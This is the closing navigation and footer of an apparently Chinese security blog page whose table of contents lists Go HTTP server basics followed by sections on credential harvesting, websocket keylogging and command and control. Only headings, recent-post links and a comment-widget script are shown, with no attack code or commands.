HTTP服务器基础</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E6%9E%84%E5%BB%BA%E4%B8%80%E4%B8%AA%E7%AE%80%E5%8D%95%E7%9A%84%E6%9C%8D%E5%8A%A1%E5%99%A8"><span class="toc-number">1.1.1.</span> <span class="toc-text">1. 构建一个简单的服务器</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E6%9E%84%E9%80%A0%E4%B8%80%E4%B8%AA%E7%AE%80%E5%8D%95%E8%B7%AF%E7%94%B1%E5%99%A8"><span class="toc-number">1.1.2.</span> <span class="toc-text">2. 构造一个简单路由器</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E6%9E%84%E9%80%A0%E4%B8%80%E4%B8%AA%E7%AE%80%E5%8D%95%E7%9A%84%E4%B8%AD%E9%97%B4%E4%BB%B6"><span class="toc-number">1.1.3.</span> <span class="toc-text">3. 构造一个简单的中间件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-%E4%BD%BF%E7%94%A8-gorilla-x2F-mux-%E5%8C%85%E8%BF%9B%E8%A1%8C%E8%B7%AF%E7%94%B1"><span class="toc-number">1.1.4.</span> <span class="toc-text">4.使用 gorilla&#x2F;mux 包进行路由</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-%E4%BD%BF%E7%94%A8negroni%E5%8C%85%E6%9E%84%E5%BB%BA%E4%B8%AD%E9%97%B4%E4%BB%B6"><span class="toc-number">1.1.5.</span> <span class="toc-text">5. 使用negroni包构建中间件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#6-%E4%BD%BF%E7%94%A8negroni%E5%8C%85%E6%B7%BB%E5%8A%A0%E8%BA%AB%E4%BB%BD%E8%AE%A4%E8%AF%81"><span class="toc-number">1.1.6.</span> <span class="toc-text">6. 使用negroni包添加身份认证</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#7-%E4%BD%BF%E7%94%A8%E6%A8%A1%E6%9D%BF%E7%94%9F%E6%88%90HTML%E5%93%8D%E5%BA%94"><span class="toc-number">1.1.7.</span> <span class="toc-text">7. 使用模板生成HTML响应</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0X01%E5%87%AD%E8%AF%81%E6%94%B6%E5%89%B2"><span class="toc-number">1.2.</span> <span class="toc-text">0X01凭证收割</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-%E4%BD%BF%E7%94%A8-websocket-API%E5%AE%9E%E7%8E%B0%E6%8C%89%E9%94%AE%E8%AE%B0%E5%BD%95"><span class="toc-number">1.3.</span> <span class="toc-text">0x02 使用 websocket API实现按键记录</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-%E5%A4%9A%E8%B7%AF%E5%91%BD%E4%BB%A4%E5%92%8C%E6%8E%A7%E5%88%B6"><span class="toc-number">1.4.</span> <span class="toc-text">0x03 多路命令和控制</span></a></li></ol></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/posts/39835.html" title="绕过Waf之分块传输"><img src="/img/image/22.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="绕过Waf之分块传输"/></a><div class="content"><a class="title" href="/posts/39835.html" title="绕过Waf之分块传输">绕过Waf之分块传输</a><time datetime="2022-03-23T14:22:37.000Z" title="发表于 2022-03-23 22:22:37">2022-03-23</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/54507.html" title="扫描器之文本相似度计算"><img src="/img/image/20.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="扫描器之文本相似度计算"/></a><div class="content"><a class="title" href="/posts/54507.html" title="扫描器之文本相似度计算">扫描器之文本相似度计算</a><time datetime="2022-03-22T07:35:07.000Z" title="发表于 2022-03-22 15:35:07">2022-03-22</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/32500.html" title="spring-gateaway分析"><img src="/img/image/19.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="spring-gateaway分析"/></a><div class="content"><a class="title" href="/posts/32500.html" title="spring-gateaway分析">spring-gateaway分析</a><time datetime="2022-03-20T15:33:32.000Z" title="发表于 2022-03-20 23:33:32">2022-03-20</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/15596.html" title="SPEL学习"><img src="/img/image/18.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="SPEL学习"/></a><div class="content"><a class="title" href="/posts/15596.html" title="SPEL学习">SPEL学习</a><time datetime="2022-03-19T03:10:48.000Z" title="发表于 2022-03-19 11:10:48">2022-03-19</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/54936.html" title="jsonp学习"><img src="/img/image/17.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="jsonp学习"/></a><div class="content"><a class="title" href="/posts/54936.html" title="jsonp学习">jsonp学习</a><time datetime="2022-03-18T05:59:32.000Z" title="发表于 2022-03-18 13:59:32">2022-03-18</time></div></div></div></div></div></div></main><footer id="footer" style="background-image: url('/img/image/5.png')"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2022 By h0ld1rs</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><a id="to_comment" href="#post-comment" title="直达评论"><i class="fas fa-comments"></i></a><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.js"></script><div class="js-pjax"><script>(()=>{
  const init = () => {
    twikoo.init(Object.assign({
      el: '#twikoo-wrap',
      envId: 'commnet-1gmkug2k1ca99452',
      region: '',
      onCommentLoaded: function () {
        btf.loadLightbox(document.querySelectorAll('#twikoo .tk-content img:not(.vemoji)'))
      }
    }, null))
  }

  const getCount = () => {
    twikoo.getCommentsCount({
      envId: 'commnet-1gmkug2k1ca99452',
      region: '',
      urls: [window.location.pathname],
      includeReply: false
    }).then(function (res) {
      document.getElementById('twikoo-count').innerText = res[0].count
    }).catch(function (err) {
      console.error(err);
    });
  }

  const runFn = () => {
    init()
    GLOBAL_CONFIG_SITE.isPost && getCount()
  }

  const loadTwikoo = () => {
    if (typeof twikoo === 'object') {
      setTimeout(runFn,0)
      return
    } 
    getScript('https://cdn.jsdelivr.net/npm/twikoo/dist/twikoo.all.min.js').then(runFn)
  }

  if ('Twikoo' === 'Twikoo' || !false) {
    if (false) btf.loadComment(document.getElementById('twikoo-wrap'), loadTwikoo)
    else loadTwikoo()
  } else {
    window.loadOtherComment = () => {
      loadTwikoo()
    }
  }
})()</script></div><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>